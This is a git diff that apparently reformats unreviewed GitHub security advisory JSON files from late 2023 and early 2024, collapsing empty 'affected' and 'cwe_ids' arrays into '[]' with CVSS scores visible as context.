diff --git a/advisories/unreviewed/2023/12/GHSA-hwgp-86hh-xvg8/GHSA-hwgp-86hh-xvg8.json b/advisories/unreviewed/2023/12/GHSA-hwgp-86hh-xvg8/GHSA-hwgp-86hh-xvg8.json
index 58949924673..cdf9dd4a0ed 100644
--- a/advisories/unreviewed/2023/12/GHSA-hwgp-86hh-xvg8/GHSA-hwgp-86hh-xvg8.json
+++ b/advisories/unreviewed/2023/12/GHSA-hwgp-86hh-xvg8/GHSA-hwgp-86hh-xvg8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-m8q6-782w-wg52/GHSA-m8q6-782w-wg52.json b/advisories/unreviewed/2023/12/GHSA-m8q6-782w-wg52/GHSA-m8q6-782w-wg52.json
index 240da0c2542..13ed16e1edc 100644
--- a/advisories/unreviewed/2023/12/GHSA-m8q6-782w-wg52/GHSA-m8q6-782w-wg52.json
+++ b/advisories/unreviewed/2023/12/GHSA-m8q6-782w-wg52/GHSA-m8q6-782w-wg52.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-mh7x-8j8h-xvj8/GHSA-mh7x-8j8h-xvj8.json b/advisories/unreviewed/2023/12/GHSA-mh7x-8j8h-xvj8/GHSA-mh7x-8j8h-xvj8.json
index 2a4de533c54..17638f4260f 100644
--- a/advisories/unreviewed/2023/12/GHSA-mh7x-8j8h-xvj8/GHSA-mh7x-8j8h-xvj8.json
+++ b/advisories/unreviewed/2023/12/GHSA-mh7x-8j8h-xvj8/GHSA-mh7x-8j8h-xvj8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "CRITICAL",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2023/12/GHSA-mj5m-hchj-w87j/GHSA-mj5m-hchj-w87j.json b/advisories/unreviewed/2023/12/GHSA-mj5m-hchj-w87j/GHSA-mj5m-hchj-w87j.json
index 48d3b748377..ad8bf265603 100644
--- a/advisories/unreviewed/2023/12/GHSA-mj5m-hchj-w87j/GHSA-mj5m-hchj-w87j.json
+++ b/advisories/unreviewed/2023/12/GHSA-mj5m-hchj-w87j/GHSA-mj5m-hchj-w87j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2023/12/GHSA-mjvh-8r83-85c4/GHSA-mjvh-8r83-85c4.json b/advisories/unreviewed/2023/12/GHSA-mjvh-8r83-85c4/GHSA-mjvh-8r83-85c4.json
index d2cccbce4e8..6add7693f8d 100644
--- a/advisories/unreviewed/2023/12/GHSA-mjvh-8r83-85c4/GHSA-mjvh-8r83-85c4.json
+++ b/advisories/unreviewed/2023/12/GHSA-mjvh-8r83-85c4/GHSA-mjvh-8r83-85c4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-pmc3-wrv7-hvx7/GHSA-pmc3-wrv7-hvx7.json b/advisories/unreviewed/2023/12/GHSA-pmc3-wrv7-hvx7/GHSA-pmc3-wrv7-hvx7.json
index 68f8c05c4ca..6bb774e4da7 100644
--- a/advisories/unreviewed/2023/12/GHSA-pmc3-wrv7-hvx7/GHSA-pmc3-wrv7-hvx7.json
+++ b/advisories/unreviewed/2023/12/GHSA-pmc3-wrv7-hvx7/GHSA-pmc3-wrv7-hvx7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-ppcc-x46f-gwhr/GHSA-ppcc-x46f-gwhr.json b/advisories/unreviewed/2023/12/GHSA-ppcc-x46f-gwhr/GHSA-ppcc-x46f-gwhr.json
index b380b6d988c..e12af0970b5 100644
--- a/advisories/unreviewed/2023/12/GHSA-ppcc-x46f-gwhr/GHSA-ppcc-x46f-gwhr.json
+++ b/advisories/unreviewed/2023/12/GHSA-ppcc-x46f-gwhr/GHSA-ppcc-x46f-gwhr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-pv24-8p56-wwvr/GHSA-pv24-8p56-wwvr.json b/advisories/unreviewed/2023/12/GHSA-pv24-8p56-wwvr/GHSA-pv24-8p56-wwvr.json
index a00da8466dc..993ad9ef8ea 100644
--- a/advisories/unreviewed/2023/12/GHSA-pv24-8p56-wwvr/GHSA-pv24-8p56-wwvr.json
+++ b/advisories/unreviewed/2023/12/GHSA-pv24-8p56-wwvr/GHSA-pv24-8p56-wwvr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-q7rc-w86v-qvqj/GHSA-q7rc-w86v-qvqj.json b/advisories/unreviewed/2023/12/GHSA-q7rc-w86v-qvqj/GHSA-q7rc-w86v-qvqj.json
index 383dff4fc88..054e32e5978 100644
--- a/advisories/unreviewed/2023/12/GHSA-q7rc-w86v-qvqj/GHSA-q7rc-w86v-qvqj.json
+++ b/advisories/unreviewed/2023/12/GHSA-q7rc-w86v-qvqj/GHSA-q7rc-w86v-qvqj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-qrq8-p6j7-hh57/GHSA-qrq8-p6j7-hh57.json b/advisories/unreviewed/2023/12/GHSA-qrq8-p6j7-hh57/GHSA-qrq8-p6j7-hh57.json
index ab00ffeb1c6..0bbbfb7ff8d 100644
--- a/advisories/unreviewed/2023/12/GHSA-qrq8-p6j7-hh57/GHSA-qrq8-p6j7-hh57.json
+++ b/advisories/unreviewed/2023/12/GHSA-qrq8-p6j7-hh57/GHSA-qrq8-p6j7-hh57.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-r6g3-72r2-jmrh/GHSA-r6g3-72r2-jmrh.json b/advisories/unreviewed/2023/12/GHSA-r6g3-72r2-jmrh/GHSA-r6g3-72r2-jmrh.json
index b24149e15ec..4bac44f59a0 100644
--- a/advisories/unreviewed/2023/12/GHSA-r6g3-72r2-jmrh/GHSA-r6g3-72r2-jmrh.json
+++ b/advisories/unreviewed/2023/12/GHSA-r6g3-72r2-jmrh/GHSA-r6g3-72r2-jmrh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-r8jm-pjg2-c23c/GHSA-r8jm-pjg2-c23c.json b/advisories/unreviewed/2023/12/GHSA-r8jm-pjg2-c23c/GHSA-r8jm-pjg2-c23c.json
index 4c40d9fde9e..a48bae95a98 100644
--- a/advisories/unreviewed/2023/12/GHSA-r8jm-pjg2-c23c/GHSA-r8jm-pjg2-c23c.json
+++ b/advisories/unreviewed/2023/12/GHSA-r8jm-pjg2-c23c/GHSA-r8jm-pjg2-c23c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-rfhr-9grr-mhwq/GHSA-rfhr-9grr-mhwq.json b/advisories/unreviewed/2023/12/GHSA-rfhr-9grr-mhwq/GHSA-rfhr-9grr-mhwq.json
index e889d912834..256176bb3e8 100644
--- a/advisories/unreviewed/2023/12/GHSA-rfhr-9grr-mhwq/GHSA-rfhr-9grr-mhwq.json
+++ b/advisories/unreviewed/2023/12/GHSA-rfhr-9grr-mhwq/GHSA-rfhr-9grr-mhwq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-rxg3-j9p8-7h3x/GHSA-rxg3-j9p8-7h3x.json b/advisories/unreviewed/2023/12/GHSA-rxg3-j9p8-7h3x/GHSA-rxg3-j9p8-7h3x.json
index a1dd5a56ed6..ba9bc93e919 100644
--- a/advisories/unreviewed/2023/12/GHSA-rxg3-j9p8-7h3x/GHSA-rxg3-j9p8-7h3x.json
+++ b/advisories/unreviewed/2023/12/GHSA-rxg3-j9p8-7h3x/GHSA-rxg3-j9p8-7h3x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-vgq8-wrpg-ch5m/GHSA-vgq8-wrpg-ch5m.json b/advisories/unreviewed/2023/12/GHSA-vgq8-wrpg-ch5m/GHSA-vgq8-wrpg-ch5m.json
index 6083b881ce3..7d446fd361c 100644
--- a/advisories/unreviewed/2023/12/GHSA-vgq8-wrpg-ch5m/GHSA-vgq8-wrpg-ch5m.json
+++ b/advisories/unreviewed/2023/12/GHSA-vgq8-wrpg-ch5m/GHSA-vgq8-wrpg-ch5m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-vjjw-5fc7-7h6p/GHSA-vjjw-5fc7-7h6p.json b/advisories/unreviewed/2023/12/GHSA-vjjw-5fc7-7h6p/GHSA-vjjw-5fc7-7h6p.json
index 37053dfc46c..8e358527c02 100644
--- a/advisories/unreviewed/2023/12/GHSA-vjjw-5fc7-7h6p/GHSA-vjjw-5fc7-7h6p.json
+++ b/advisories/unreviewed/2023/12/GHSA-vjjw-5fc7-7h6p/GHSA-vjjw-5fc7-7h6p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-vxjj-qm22-4cqm/GHSA-vxjj-qm22-4cqm.json b/advisories/unreviewed/2023/12/GHSA-vxjj-qm22-4cqm/GHSA-vxjj-qm22-4cqm.json
index 03ba76582d1..3b8bcf74bcc 100644
--- a/advisories/unreviewed/2023/12/GHSA-vxjj-qm22-4cqm/GHSA-vxjj-qm22-4cqm.json
+++ b/advisories/unreviewed/2023/12/GHSA-vxjj-qm22-4cqm/GHSA-vxjj-qm22-4cqm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-w6w3-g8wc-h88m/GHSA-w6w3-g8wc-h88m.json b/advisories/unreviewed/2023/12/GHSA-w6w3-g8wc-h88m/GHSA-w6w3-g8wc-h88m.json
index a4567606a33..ca61224d20a 100644
--- a/advisories/unreviewed/2023/12/GHSA-w6w3-g8wc-h88m/GHSA-w6w3-g8wc-h88m.json
+++ b/advisories/unreviewed/2023/12/GHSA-w6w3-g8wc-h88m/GHSA-w6w3-g8wc-h88m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-wchp-7c65-4hqg/GHSA-wchp-7c65-4hqg.json b/advisories/unreviewed/2023/12/GHSA-wchp-7c65-4hqg/GHSA-wchp-7c65-4hqg.json
index 99b7da38b4d..44cfe4e7e30 100644
--- a/advisories/unreviewed/2023/12/GHSA-wchp-7c65-4hqg/GHSA-wchp-7c65-4hqg.json
+++ b/advisories/unreviewed/2023/12/GHSA-wchp-7c65-4hqg/GHSA-wchp-7c65-4hqg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-wpj8-2grx-f965/GHSA-wpj8-2grx-f965.json b/advisories/unreviewed/2023/12/GHSA-wpj8-2grx-f965/GHSA-wpj8-2grx-f965.json
index 3819622b923..2937cdaaca6 100644
--- a/advisories/unreviewed/2023/12/GHSA-wpj8-2grx-f965/GHSA-wpj8-2grx-f965.json
+++ b/advisories/unreviewed/2023/12/GHSA-wpj8-2grx-f965/GHSA-wpj8-2grx-f965.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-x9cr-h838-qp47/GHSA-x9cr-h838-qp47.json b/advisories/unreviewed/2023/12/GHSA-x9cr-h838-qp47/GHSA-x9cr-h838-qp47.json
index 781d3e79896..f16d508e9a2 100644
--- a/advisories/unreviewed/2023/12/GHSA-x9cr-h838-qp47/GHSA-x9cr-h838-qp47.json
+++ b/advisories/unreviewed/2023/12/GHSA-x9cr-h838-qp47/GHSA-x9cr-h838-qp47.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-xgfv-h6v5-c2rq/GHSA-xgfv-h6v5-c2rq.json b/advisories/unreviewed/2023/12/GHSA-xgfv-h6v5-c2rq/GHSA-xgfv-h6v5-c2rq.json
index d69bff745a9..094dd044b11 100644
--- a/advisories/unreviewed/2023/12/GHSA-xgfv-h6v5-c2rq/GHSA-xgfv-h6v5-c2rq.json
+++ b/advisories/unreviewed/2023/12/GHSA-xgfv-h6v5-c2rq/GHSA-xgfv-h6v5-c2rq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2023/12/GHSA-xxx9-8q88-3qrf/GHSA-xxx9-8q88-3qrf.json b/advisories/unreviewed/2023/12/GHSA-xxx9-8q88-3qrf/GHSA-xxx9-8q88-3qrf.json
index 2fce1734849..f1e2980d2f7 100644
--- a/advisories/unreviewed/2023/12/GHSA-xxx9-8q88-3qrf/GHSA-xxx9-8q88-3qrf.json
+++ b/advisories/unreviewed/2023/12/GHSA-xxx9-8q88-3qrf/GHSA-xxx9-8q88-3qrf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-32h2-7245-4mh4/GHSA-32h2-7245-4mh4.json b/advisories/unreviewed/2024/01/GHSA-32h2-7245-4mh4/GHSA-32h2-7245-4mh4.json
index e9ec549c986..6785aec083d 100644
--- a/advisories/unreviewed/2024/01/GHSA-32h2-7245-4mh4/GHSA-32h2-7245-4mh4.json
+++ b/advisories/unreviewed/2024/01/GHSA-32h2-7245-4mh4/GHSA-32h2-7245-4mh4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json b/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json
index a9fe91a219a..7996316777d 100644
--- a/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json
+++ b/advisories/unreviewed/2024/01/GHSA-33f3-88p6-j3f9/GHSA-33f3-88p6-j3f9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json b/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json
index fd33d77d532..0afd04d06f4 100644
--- a/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json
+++ b/advisories/unreviewed/2024/01/GHSA-3qmj-w5mh-5gv3/GHSA-3qmj-w5mh-5gv3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json b/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json
index 610a1f7c210..12eebfade16 100644
--- a/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json
+++ b/advisories/unreviewed/2024/01/GHSA-3qxr-cm3w-hpmq/GHSA-3qxr-cm3w-hpmq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-43m9-4wr2-6m47/GHSA-43m9-4wr2-6m47.json b/advisories/unreviewed/2024/01/GHSA-43m9-4wr2-6m47/GHSA-43m9-4wr2-6m47.json
index 10dc6ed062f..3e9ded7edd9 100644
--- a/advisories/unreviewed/2024/01/GHSA-43m9-4wr2-6m47/GHSA-43m9-4wr2-6m47.json
+++ b/advisories/unreviewed/2024/01/GHSA-43m9-4wr2-6m47/GHSA-43m9-4wr2-6m47.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json b/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json
index 75b4d0160f1..5ab2ab1d426 100644
--- a/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json
+++ b/advisories/unreviewed/2024/01/GHSA-44qm-928x-6p3g/GHSA-44qm-928x-6p3g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json b/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json
index 324120bdd37..4ac32ec99e4 100644
--- a/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json
+++ b/advisories/unreviewed/2024/01/GHSA-4q9c-68c7-fxff/GHSA-4q9c-68c7-fxff.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json b/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json
index f8545051769..ab73dc06cee 100644
--- a/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json
+++ b/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -43,9 +41,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/01/GHSA-6xx6-9hj3-4rv2/GHSA-6xx6-9hj3-4rv2.json b/advisories/unreviewed/2024/01/GHSA-6xx6-9hj3-4rv2/GHSA-6xx6-9hj3-4rv2.json
index 75276da3388..ee38cdd99e0 100644
--- a/advisories/unreviewed/2024/01/GHSA-6xx6-9hj3-4rv2/GHSA-6xx6-9hj3-4rv2.json
+++ b/advisories/unreviewed/2024/01/GHSA-6xx6-9hj3-4rv2/GHSA-6xx6-9hj3-4rv2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-74mv-jm52-5vhc/GHSA-74mv-jm52-5vhc.json b/advisories/unreviewed/2024/01/GHSA-74mv-jm52-5vhc/GHSA-74mv-jm52-5vhc.json
index e543a2eae18..7f46cffc12d 100644
--- a/advisories/unreviewed/2024/01/GHSA-74mv-jm52-5vhc/GHSA-74mv-jm52-5vhc.json
+++ b/advisories/unreviewed/2024/01/GHSA-74mv-jm52-5vhc/GHSA-74mv-jm52-5vhc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json b/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json
index 1a0e346ba29..18141f8cbe9 100644
--- a/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json
+++ b/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json b/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json
index 52e8395b25c..4d29e85be7a 100644
--- a/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json
+++ b/advisories/unreviewed/2024/01/GHSA-9h4j-w5f8-xjpc/GHSA-9h4j-w5f8-xjpc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-9m9m-5xqh-55gx/GHSA-9m9m-5xqh-55gx.json b/advisories/unreviewed/2024/01/GHSA-9m9m-5xqh-55gx/GHSA-9m9m-5xqh-55gx.json
index 86367c9a358..cb5b259d2d1 100644
--- a/advisories/unreviewed/2024/01/GHSA-9m9m-5xqh-55gx/GHSA-9m9m-5xqh-55gx.json
+++ b/advisories/unreviewed/2024/01/GHSA-9m9m-5xqh-55gx/GHSA-9m9m-5xqh-55gx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json b/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json
index 989fda3cc67..7bac8b68d01 100644
--- a/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json
+++ b/advisories/unreviewed/2024/01/GHSA-9mx6-23q4-mcch/GHSA-9mx6-23q4-mcch.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json b/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json
index 984dab2a716..db072375699 100644
--- a/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json
+++ b/advisories/unreviewed/2024/01/GHSA-9vm4-r3mm-m2cq/GHSA-9vm4-r3mm-m2cq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json b/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json
index 0a2bf3b81d6..1656de52884 100644
--- a/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json
+++ b/advisories/unreviewed/2024/01/GHSA-9x52-pxhj-x4j7/GHSA-9x52-pxhj-x4j7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json b/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json
index 935609a0331..e6ca3f6e322 100644
--- a/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json
+++ b/advisories/unreviewed/2024/01/GHSA-cvpg-3pfh-m39w/GHSA-cvpg-3pfh-m39w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
